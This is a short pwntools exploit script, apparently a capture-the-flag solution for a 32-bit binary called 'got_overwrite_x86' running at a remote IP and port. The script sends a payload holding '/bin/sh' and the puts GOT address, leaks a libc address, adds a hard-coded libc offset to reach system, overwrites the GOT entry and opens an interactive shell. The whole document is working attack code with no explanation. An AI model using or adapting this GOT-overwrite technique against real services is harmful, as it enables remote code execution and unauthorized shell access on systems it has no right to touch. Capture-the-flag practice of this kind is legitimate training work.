from pwn import *
# p = process('./got_overwrite_x86')
p = remote('106.55.152.166', 38085)

context(log_level = 'debug', arch = 'i386', os = 'linux')

puts_got = 0x0804a01c

sys2libcmain = 0x23fe0  # libc6-i386_2.27-3ubuntu1.4_amd64

payload1 = b"/bin/sh" + b'\x00' + b'a' * 16 + p32(puts_got)
p.sendafter("Now Playing: Simple Minds (Breakfast)\n", payload1)
p.recvuntil('(')
libcmain = p.recv(8)[4:]
addr = 0
for i in range(len(libcmain)):
    print(libcmain[i])
    addr += (libcmain[i]) * (16**(i*2))
addr += sys2libcmain
p.send(p32(addr))
p.interactive()
